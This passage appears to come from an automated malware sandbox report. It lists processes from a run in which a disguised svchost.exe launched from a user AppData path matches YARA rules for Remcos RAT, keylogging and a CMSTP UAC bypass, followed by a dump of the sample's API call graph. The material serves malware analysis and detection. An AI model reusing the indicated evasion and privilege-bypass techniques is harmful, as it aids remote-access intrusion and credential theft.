                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:04
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.1959006729.0000000000822000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:06
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'235'968 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:8A50E57282AB78C6D3930BA31E2E66D7
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:07
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
Commandline:C:\Windows\SysWow64\perfhost.exe
Imagebase:0x400000
File size:1'150'976 bytes
MD5 hash:39B7A38B4D293A74193E0AFFD1CF7BBC
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:27
Start time:09:28:08
Start date:08/10/2024
Path:C:\Windows\System32\Locator.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\locator.exe
Imagebase:0x140000000
File size:1'141'248 bytes
MD5 hash:1668426D4049F247816A6509230B04D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:28
Start time:09:28:10
Start date:08/10/2024
Path:C:\Windows\System32\SensorDataService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\SensorDataService.exe
Imagebase:0x140000000
File size:1'846'784 bytes
MD5 hash:39A4234D5B8BA6534DB70A8421277A62
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:09:28:10
Start date:08/10/2024
Path:C:\Windows\System32\snmptrap.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\snmptrap.exe
Imagebase:0x140000000
File size:1'146'880 bytes
MD5 hash:77032644518A6E344DB3C45614BB3462
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:30
Start time:09:28:11
Start date:08/10/2024
Path:C:\Windows\System32\Spectrum.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\spectrum.exe
Imagebase:0x140000000
File size:1'455'616 bytes
MD5 hash:B90A4BF24B298B6114E19987A67C9450
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:09:28:12
Start date:08/10/2024
Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
Imagebase:0x140000000
File size:1'511'424 bytes
MD5 hash:528551BC5915FF99C29746E159C1E483
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:33
Start time:09:28:13
Start date:08/10/2024
Path:C:\Windows\System32\TieringEngineService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\TieringEngineService.exe
Imagebase:0x140000000
File size:1'455'616 bytes
MD5 hash:022EEAB6B3A6A0E570E90A480C9C1AEB
Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

Target ID:34
Start time:09:28:14
Start date:08/10/2024
Path:C:\Windows\System32\AgentService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\AgentService.exe
Imagebase:0x140000000
File size:1'801'216 bytes
MD5 hash:085BAFAFBBA6343A8BA8B383CB55A16F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:09:28:15
Start date:08/10/2024
Path:C:\Windows\System32\vds.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\vds.exe
Imagebase:0x140000000
File size:1'303'552 bytes
MD5 hash:FD669AD0BA373802EC20BC543357973C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:37
Start time:09:28:17
Start date:08/10/2024
Path:C:\Windows\System32\wbengine.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\wbengine.exe"
Imagebase:0x140000000
File size:2'164'736 bytes
MD5 hash:C9F70CE234FCA9526C1C5BFCDAF44E2B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Execution Graph

Execution Coverage:4.3%
Dynamic/Decrypted Code Coverage:0.4%
Signature Coverage:8.8%
Total number of Nodes:2000
Total number of Limit Nodes:36
__call_reportfault 65758->65761 65760 417ed1 GetCurrentProcess TerminateProcess 65760->65684 65762 41a208 65761->65762 65763 41a210 65762->65763 65764 41a212 IsDebuggerPresent 65762->65764 65763->65760 65770 41fe19 65764->65770 65767 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 65768 421ff0 __call_reportfault 65767->65768 65769 421ff8 GetCurrentProcess TerminateProcess 65767->65769 65768->65769 65769->65760 65770->65767 65771->65688 65773 408f48 moneypunct 65772->65773 65774 4265c7 VariantClear 65773->65774 65775 408f55 moneypunct 65773->65775 65774->65775 65775->65693 65832 40ebd0 65776->65832 65836 4182cb 65779->65836 65781 41195e 65843 4181f2 LeaveCriticalSection 65781->65843 65783 40d748 65784 4119b0 65783->65784 65785 4119d6 65784->65785 65786 4119bc 65784->65786 65785->65701 65786->65785 65878 417f77 46 API calls __getptd_noexit 65786->65878 65788 4119c6 65879 417f25 10 API calls __wcsnicmp 65788->65879 65790 4119d1 65790->65701 65791->65703 65880 401f20 65792->65880 65794 40d5b6 IsDebuggerPresent 65795 40d5c4 65794->65795 65796 42e1bb MessageBoxA 65794->65796 65797 42e1d4 65795->65797 65798 40d5e3 65795->65798 65796->65797 66051 403a50 52 API calls 3 library calls 65797->66051 65949 40f520 65798->65949 65802 40d63b 65805 40d643 65802->65805 65806 42e231 SetCurrentDirectoryW 65802->65806 65803 40d5fd GetFullPathNameW 65961 401460 65803->65961 65807 40d64c 65805->65807 66052 432fee 6 API calls 65805->66052 65806->65805 65976 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 65807->65976 65810 42e252 65810->65807 65812 42e25a GetModuleFileNameW 65810->65812 65814 42e274 65812->65814 65815 42e2cb GetForegroundWindow ShellExecuteW 65812->65815 66053 401b10 65814->66053 65817 40d688 65815->65817 65816 40d656 65819 40d669 65816->65819 65821 40e0c0 74 API calls 65816->65821 65823 40d692 SetCurrentDirectoryW 65817->65823 65984 4091e0 65819->65984 65821->65819 65823->65705 65826 42e28d 66060 40d200 52 API calls 2 library calls 
65826->66060 65829 42e299 GetForegroundWindow ShellExecuteW 65830 42e2c6 65829->65830 65830->65817 65831 40ec00 LoadLibraryA GetProcAddress 65831->65696 65833 40d72e 65832->65833 65834 40ebd6 LoadLibraryA 65832->65834 65833->65696 65833->65831 65834->65833 65835 40ebe7 GetProcAddress 65834->65835 65835->65833 65837 4182e0 65836->65837 65838 4182f3 EnterCriticalSection 65836->65838 65844 418209 65837->65844 65838->65781 65840 4182e6 65840->65838 65871 411924 46 API calls 3 library calls 65840->65871 65843->65783 65845 418215 __wsopen_helper 65844->65845 65846 418225 65845->65846 65847 41823d 65845->65847 65872 418901 46 API calls __NMSG_WRITE 65846->65872 65849 416b04 __malloc_crt 45 API calls 65847->65849 65855 41824b __wsopen_helper 65847->65855 65851 418256 65849->65851 65850 41822a 65873 418752 46 API calls 6 library calls 65850->65873 65853 41825d 65851->65853 65854 41826c 65851->65854 65875 417f77 46 API calls __getptd_noexit 65853->65875 65858 4182cb __lock 45 API calls 65854->65858 65855->65840 65856 418231 65874 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 65856->65874 65860 418273 65858->65860 65862 4182a6 65860->65862 65863 41827b InitializeCriticalSectionAndSpinCount 65860->65863 65864 413748 _free 45 API calls 65862->65864 65865 418297 65863->65865 65866 41828b 65863->65866 65864->65865 65877 4182c2 LeaveCriticalSection _doexit 65865->65877 65867 413748 _free 45 API calls 65866->65867 65869 418291 65867->65869 65876 417f77 46 API calls __getptd_noexit 65869->65876 65872->65850 65873->65856 65875->65855 65876->65865 65877->65855 65878->65788 65879->65790 66061 40e6e0 65880->66061 65882 401f31 65883 401f41 GetModuleFileNameW 65882->65883 66064 410100 65883->66064 65885 401f5c 66076 410960 65885->66076 65888 401b10 52 API calls 65889 401f81 65888->65889 66079 401980 65889->66079 65891 401f8e 65892 408f40 VariantClear 65891->65892 65893 401f9d 65892->65893 65894 401b10 52 API calls 65893->65894 65895 401fb4 65894->65895 65896 
401980 53 API calls 65895->65896 65897 401fc3 65896->65897 65898 401b10 52 API calls 65897->65898 65899 401fd2 65898->65899 66087 40c2c0 65899->66087 65901 401fe1 65902 40bc70 52 API calls 65901->65902 65903 401ff3 65902->65903 66105 401a10 65903->66105 65905 401ffe 66112 4114ab 65905->66112 65908 428b05 65910 401a10 52 API calls 65908->65910 65909 402017 65911 4114ab __wcsicoll 58 API calls 65909->65911 65912 428b18 65910->65912 65913 402022 65911->65913 65915 401a10 52 API calls 65912->65915 65913->65912 65914 40202d 65913->65914 65916 4114ab __wcsicoll 58 API calls 65914->65916 65917 428b33 65915->65917 65918 402038 65916->65918 65920 428b3b GetModuleFileNameW 65917->65920 65919 402043 65918->65919 65918->65920 65921 4114ab __wcsicoll 58 API calls 65919->65921 65922 401a10 52 API calls 65920->65922 65923 40204e 65921->65923 65924 428b6c 65922->65924 65925 402092 65923->65925 65929 401a10 52 API calls 65923->65929 65934 428b90 _wcscpy 65923->65934 65926 40e0a0 52 API calls 65924->65926 65928 4020a3 65925->65928 65925->65934 65927 428b7a 65926->65927 65930 401a10 52 API calls 65927->65930 65931 428bc6 65928->65931 66120 40e830 53 API calls 65928->66120 65932 402073 _wcscpy 65929->65932 65933 428b88 65930->65933 65940 401a10 52 API calls 65932->65940 65933->65934 65937 401a10 52 API calls 65934->65937 65936 4020bb 66121 40cf00 53 API calls 65936->66121 65944 4020d0 65937->65944 65939 4020c6 65941 408f40 VariantClear 65939->65941 65940->65925 65941->65944 65942 402110 65946 408f40 VariantClear 65942->65946 65944->65942 65947 401a10 52 API calls 65944->65947 66122 40cf00 53 API calls 65944->66122 66123 40e6a0 53 API calls 65944->66123 65948 402120 moneypunct 65946->65948 65947->65944 65948->65794 65950 40f53c 65949->65950 65952 4295c9 __wctomb_s_l 65949->65952 66795 410120 65950->66795 65954 4295d9 GetOpenFileNameW 65952->65954 65953 40f545 66799 4102b0 SHGetMalloc 65953->66799 65954->65950 65955 40d5f5 65954->65955 65955->65802 65955->65803 65957 40f54c 66804 410190 
GetFullPathNameW 65957->66804 65959 40f559 66815 40f570 65959->66815 66877 402400 65961->66877 65963 40146f 65966 428c29 _wcscat 65963->65966 66886 401500 65963->66886 65965 40147c 65965->65966 66894 40d440 65965->66894 65968 401489 65968->65966 65969 401491 GetFullPathNameW 65968->65969 65970 402160 52 API calls 65969->65970 65971 4014bb 65970->65971 65972 402160 52 API calls 65971->65972 65973 4014c8 65972->65973 65973->65966 65974 402160 52 API calls 65973->65974 65975 4014ee 65974->65975 65975->65802 65977 428361 65976->65977 65978 4103fc LoadImageW RegisterClassExW 65976->65978 66914 44395e EnumResourceNamesW LoadImageW 65977->66914 66913 410490 7 API calls 65978->66913 65981 40d651 65983 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 65981->65983 65982 428368 65983->65816 65985 409202 65984->65985 65986 42d7ad 65984->65986 66041 409216 moneypunct 65985->66041 67177 410940 331 API calls 65985->67177 67180 45e737 90 API calls 3 library calls 65986->67180 65989 40939c 65989->65817 66050 401000 Shell_NotifyIconW __wctomb_s_l 65989->66050 65991 4095b2 65991->65989 65993 4095bf 65991->65993 65992 409253 PeekMessageW 65992->66041 67179 401a50 331 API calls 65993->67179 65995 42d8cd Sleep 65995->66041 65996 4095c6 LockWindowUpdate DestroyWindow GetMessageW 65996->65989 65999 4095f9 65996->65999 65998 42e13b 67198 40d410 VariantClear 65998->67198 66001 42e158 TranslateMessage DispatchMessageW GetMessageW 65999->66001 66001->66001 66005 42e188 66001->66005 66003 409567 PeekMessageW 66003->66041 66004 409386 66004->65989 67178 40f190 10 API calls 66004->67178 66005->65989 66008 44c29d 52 API calls 66049 4094e0 66008->66049 66009 46fdbf 108 API calls 66009->66049 66010 46f3c1 107 API calls 66010->66041 66011 40e0a0 52 API calls 66011->66041 66012 409551 TranslateMessage DispatchMessageW 66012->66003 66014 42dcd2 WaitForSingleObject 66017 42dcf0 GetExitCodeProcess CloseHandle 66014->66017 66014->66041 66015 42dd3d Sleep 66015->66049 66016 47d33e 309 API 
calls 66016->66041 67187 40d410 VariantClear 66017->67187 66021 4094cf Sleep 66021->66049 66023 40d410 VariantClear 66023->66041 66025 42d94d timeGetTime 67183 465124 53 API calls 66025->67183 66027 40c620 timeGetTime 66027->66049 66029 42dd89 CloseHandle 66029->66049 66031 465124 53 API calls 66031->66049 66032 42de19 GetExitCodeProcess CloseHandle 66032->66049 66035 42de88 Sleep 66035->66041 66040 45e737 90 API calls 66040->66041 66041->65992 66041->65995 66041->65998 66041->66003 66041->66004 66041->66010 66041->66011 66041->66012 66041->66014 66041->66015 66041->66016 66041->66021 66041->66023 66041->66025 66041->66040 66042 42e0cc VariantClear 66041->66042 66043 408f40 VariantClear 66041->66043 66041->66049 66915 4091b0 66041->66915 66973 40afa0 66041->66973 66999 408fc0 66041->66999 67034 408cc0 66041->67034 67048 4096a0 66041->67048 67175 40d150 TranslateAcceleratorW 66041->67175 67176 40d170 IsDialogMessageW GetClassLongW 66041->67176 67181 465124 53 API calls 66041->67181 67182 40c620 timeGetTime 66041->67182 67197 40e270 VariantClear moneypunct 66041->67197 66042->66041 66043->66041 66045 401980 53 API calls 66045->66049 66046 408f40 VariantClear 66046->66049 66047 401b10 52 API calls 66047->66049 66049->66008 66049->66009 66049->66027 66049->66029 66049->66031 66049->66032 66049->66035 66049->66041 66049->66045 66049->66046 66049->66047 67184 45178a 54 API calls 66049->67184 67185 47d33e 331 API calls 66049->67185 67186 453bc6 54 API calls 66049->67186 67188 40d410 VariantClear 66049->67188 67189 443d19 67 API calls _wcslen 66049->67189 67190 4574b4 VariantClear 66049->67190 67191 403cd0 66049->67191 67195 4731e1 VariantClear 66049->67195 67196 4331a2 6 API calls 66049->67196 66050->65817 66051->65802 66052->65810 66054 401b16 _wcslen 66053->66054 66055 4115d7 52 API calls 66054->66055 66057 401b63 66054->66057 66056 401b4b _memmove 66055->66056 66058 4115d7 52 API calls 66056->66058 66059 40d200 52 API calls 2 library calls 66057->66059 66058->66057 
66059->65826 66060->65829 66062 40bc70 52 API calls 66061->66062 66063 40e6ee 66062->66063 66063->65882 66124 40f760 66064->66124 66067 410118 66067->65885 66069 42805d 66070 42806a 66069->66070 66180 431e58 66069->66180 66072 413748 _free 46 API calls 66070->66072 66073 428078 66072->66073 66074 431e58 82 API calls 66073->66074 66075 428084 66074->66075 66075->65885 66077 4115d7 52 API calls 66076->66077 66078 401f74 66077->66078 66078->65888 66080 4019a3 66079->66080 66086 401985 66079->66086 66081 4019b8 66080->66081 66080->66086 66784 403e10 53 API calls 66081->66784 66083 40199f 66083->65891 66085 4019c4 66085->65891 66086->66083 66783 403e10 53 API calls 66086->66783 66088 40c2c7 66087->66088 66089 40c30e 66087->66089 66090 40c2d3 66088->66090 66091 426c79 66088->66091 66092 40c315 66089->66092 66093 426c2b 66089->66093 66785 403ea0 52 API calls __cinit 66090->66785 66790 4534e3 52 API calls 66091->66790 66097 40c321 66092->66097 66102 426c5a 66092->66102 66095 426c4b 66093->66095 66096 426c2e 66093->66096 66788 4534e3 52 API calls 66095->66788 66103 40c2de 66096->66103 66787 4534e3 52 API calls 66096->66787 66786 403ea0 52 API calls __cinit 66097->66786 66789 4534e3 52 API calls 66102->66789 66103->65901 66106 401a30 66105->66106 66107 401a17 66105->66107 66109 402160 52 API calls 66106->66109 66108 401a2d 66107->66108 66791 403c30 52 API calls _memmove 66107->66791 66108->65905 66111 401a3d 66109->66111 66111->65905 66113 411523 66112->66113 66114 4114ba 66112->66114 66794 4113a8 58 API calls 3 library calls 66113->66794 66119 40200c 66114->66119 66792 417f77 46 API calls __getptd_noexit 66114->66792 66117 4114c6 66793 417f25 10 API calls __wcsnicmp 66117->66793 66119->65908 66119->65909 66120->65936 66121->65939 66122->65944 66123->65944 66184 40f6f0 66124->66184 66126 40f77b _strcat moneypunct 66192 40f850 66126->66192 66131 427c2a 66222 414d04 66131->66222 66133 40f7fc 66133->66131 66135 40f804 66133->66135 66209 414a46 66135->66209 66139 40f80e 
66139->66067 66143 4528bd 66139->66143 66140 427c59 66228 414fe2 66140->66228 66142 427c79 66144 4150d1 _fseek 81 API calls 66143->66144 66145 452930 66144->66145 66725 452719 66145->66725 66148 452948 66148->66069 66149 414d04 __fread_nolock 61 API calls 66150 452966 66149->66150 66151 414d04 __fread_nolock 61 API calls 66150->66151 66152 452976 66151->66152 66153 414d04 __fread_nolock 61 API calls 66152->66153 66154 45298f 66153->66154 66155 414d04 __fread_nolock 61 API calls 66154->66155 66156 4529aa 66155->66156 66157 4150d1 _fseek 81 API calls 66156->66157 66158 4529c4 66157->66158 66159 4135bb _malloc 46 API calls 66158->66159 66160 4529cf 66159->66160 66161 4135bb _malloc 46 API calls 66160->66161 66162 4529db 66161->66162 66163 414d04 __fread_nolock 61 API calls 66162->66163 66164 4529ec 66163->66164 66165 44afef GetSystemTimeAsFileTime 66164->66165 66166 452a00 66165->66166 66167 452a36 66166->66167 66168 452a13 66166->66168 66169 452aa5 66167->66169 66170 452a3c 66167->66170 66171 413748 _free 46 API calls 66168->66171 66173 413748 _free 46 API calls 66169->66173 66731 44b1a9 66170->66731 66174 452a1c 66171->66174 66176 452aa3 66173->66176 66177 413748 _free 46 API calls 66174->66177 66175 452a9d 66179 413748 _free 46 API calls 66175->66179 66176->66069 66178 452a25 66177->66178 66178->66069 66179->66176 66181 431e64 66180->66181 66183 431e6a 66180->66183 66182 414a46 __fcloseall 82 API calls 66181->66182 66182->66183 66183->66070 66185 425de2 66184->66185 66186 40f6fc _wcslen 66184->66186 66185->66126 66187 40f710 WideCharToMultiByte 66186->66187 66188 40f756 66187->66188 66189 40f728 66187->66189 66188->66126 66190 4115d7 52 API calls 66189->66190 66191 40f735 WideCharToMultiByte 66190->66191 66191->66126 66194 40f85d __wctomb_s_l _strlen 66192->66194 66193 426b3b 66194->66193 66196 40f7ab 66194->66196 66241 414db8 66194->66241 66197 4149c2 66196->66197 66253 414904 66197->66253 66199 40f7e9 66199->66131 66200 40f5c0 66199->66200 66204 40f5cd _strcat 
__write_nolock _memmove 66200->66204 66201 414d04 __fread_nolock 61 API calls 66201->66204 66202 40f691 __tzset_nolock 66202->66133 66204->66201 66204->66202 66208 425d11 66204->66208 66341 4150d1 66204->66341 66205 4150d1 _fseek 81 API calls 66206 425d33 66205->66206 66207 414d04 __fread_nolock 61 API calls 66206->66207 66207->66202 66208->66205 66210 414a52 __wsopen_helper 66209->66210 66211 414a64 66210->66211 66212 414a79 66210->66212 66481 417f77 46 API calls __getptd_noexit 66211->66481 66215 415471 __lock_file 47 API calls 66212->66215 66221 414a74 __wsopen_helper 66212->66221 66214 414a69 66482 417f25 10 API calls __wcsnicmp 66214->66482 66217 414a92 66215->66217 66465 4149d9 66217->66465 66221->66139 66550 414c76 66222->66550 66224 414d1c 66225 44afef 66224->66225 66718 442c5a 66225->66718 66227 44b00d 66227->66140 66229 414fee __wsopen_helper 66228->66229 66230 414ffa 66229->66230 66231 41500f 66229->66231 66722 417f77 46 API calls __getptd_noexit 66230->66722 66233 415471 __lock_file 47 API calls 66231->66233 66235 415017 66233->66235 66234 414fff 66723 417f25 10 API calls __wcsnicmp 66234->66723 66237 414e4e __ftell_nolock 51 API calls 66235->66237 66238 415024 66237->66238 66724 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 66238->66724 66239 41500a __wsopen_helper 66239->66142 66242 414dd6 66241->66242 66243 414deb 66241->66243 66250 417f77 46 API calls __getptd_noexit 66242->66250 66243->66242 66245 414df2 66243->66245 66248 414de6 66245->66248 66252 418f98 77 API calls 5 library calls 66245->66252 66246 414ddb 66251 417f25 10 API calls __wcsnicmp 66246->66251 66248->66194 66250->66246 66251->66248 66252->66248 66255 414910 __wsopen_helper 66253->66255 66254 414923 66309 417f77 46 API calls __getptd_noexit 66254->66309 66255->66254 66257 414951 66255->66257 66272 41d4d1 66257->66272 66258 414928 66310 417f25 10 API calls __wcsnicmp 66258->66310 66261 414956 66262 41496a 66261->66262 66263 41495d 66261->66263 66265 414992 66262->66265 
66266 414972 66262->66266 66311 417f77 46 API calls __getptd_noexit 66263->66311 66289 41d218 66265->66289 66312 417f77 46 API calls __getptd_noexit 66266->66312 66270 414933 __wsopen_helper @_EH4_CallFilterFunc@8 66270->66199 66273 41d4dd __wsopen_helper 66272->66273 66274 4182cb __lock 46 API calls 66273->66274 66286 41d4eb 66274->66286 66275 41d560 66314 41d5fb 66275->66314 66276 41d567 66278 416b04 __malloc_crt 46 API calls 66276->66278 66280 41d56e 66278->66280 66279 41d5f0 __wsopen_helper 66279->66261 66280->66275 66281 41d57c InitializeCriticalSectionAndSpinCount 66280->66281 66283 41d59c 66281->66283 66284 41d5af EnterCriticalSection 66281->66284 66287 413748 _free 46 API calls 66283->66287 66284->66275 66285 418209 __mtinitlocknum 46 API calls 66285->66286 66286->66275 66286->66276 66286->66285 66317 4154b2 47 API calls __lock 66286->66317 66318 415520 LeaveCriticalSection LeaveCriticalSection _doexit 66286->66318 66287->66275 66290 41d23a 66289->66290 66291 41d255 66290->66291 66303 41d26c __wopenfile 66290->66303 66323 417f77 46 API calls __getptd_noexit 66291->66323 66293 41d421 66296 41d47a 66293->66296 66297 41d48c 66293->66297 66294 41d25a 66324 417f25 10 API calls __wcsnicmp 66294->66324 66328 417f77 46 API calls __getptd_noexit 66296->66328 66320 422bf9 66297->66320 66300 41499d 66313 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 66300->66313 66301 41d47f 66329 417f25 10 API calls __wcsnicmp 66301->66329 66303->66293 66303->66296 66303->66303 66325 41341f 58 API calls 2 library calls 66303->66325 66305 41d41a 66305->66293 66326 41341f 58 API calls 2 library calls 66305->66326 66307 41d439 66307->66293 66327 41341f 58 API calls 2 library calls 66307->66327 66309->66258 66310->66270 66311->66270 66312->66270 66313->66270 66319 4181f2 LeaveCriticalSection 66314->66319 66316 41d602 66316->66279 66317->66286 66318->66286 66319->66316 66330 422b35 66320->66330 66322 422c14 66322->66300 66323->66294 66324->66300 66325->66305 66326->66307 
66327->66293 66328->66301 66329->66300 66332 422b41 __wsopen_helper 66330->66332 66331 422b54 66333 417f77 __wcsnicmp 46 API calls 66331->66333 66332->66331 66334 422b8a 66332->66334 66335 422b59 66333->66335 66337 422400 __tsopen_nolock 109 API calls 66334->66337 66336 417f25 __wcsnicmp 10 API calls 66335->66336 66340 422b63 __wsopen_helper 66336->66340 66338 422ba4 66337->66338 66339 422bcb __wsopen_helper LeaveCriticalSection 66338->66339 66339->66340 66340->66322 66342 4150dd __wsopen_helper 66341->66342 66343 4150e9 66342->66343 66345 41510f 66342->66345 66372 417f77 46 API calls __getptd_noexit 66343->66372 66354 415471 66345->66354 66347 4150ee 66373 417f25 10 API calls __wcsnicmp 66347->66373 66353 4150f9 __wsopen_helper 66353->66204 66355 415483 66354->66355 66356 4154a5 EnterCriticalSection 66354->66356 66355->66356 66357 41548b 66355->66357 66358 415117 66356->66358 66359 4182cb __lock 46 API calls 66357->66359 66360 415047 66358->66360 66359->66358 66361 415067 66360->66361 66362 415057 66360->66362 66364 415079 66361->66364 66375 414e4e 66361->66375 66430 417f77 46 API calls __getptd_noexit 66362->66430 66392 41443c 66364->66392 66365 41505c 66374 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 66365->66374 66370 4150b9 66405 41e1f4 66370->66405 66372->66347 66373->66353 66374->66353 66376 414e61 66375->66376 66377 414e79 66375->66377 66431 417f77 46 API calls __getptd_noexit 66376->66431 66379 414139 __stbuf 46 API calls 66377->66379 66381 414e80 66379->66381 66380 414e66 66432 417f25 10 API calls __wcsnicmp 66380->66432 66384 41e1f4 __write 51 API calls 66381->66384 66383 414e71 66383->66364 66385 414e97 66384->66385 66385->66383 66386 414f09 66385->66386 66387 414ec9 66385->66387 66433 417f77 46 API calls __getptd_noexit 66386->66433 66387->66383 66389 41e1f4 __write 51 API calls 66387->66389 66390 414f64 66389->66390 66390->66383 66391 41e1f4 __write 51 API calls 66390->66391 66391->66383 66393 414455 66392->66393 66397 414477 
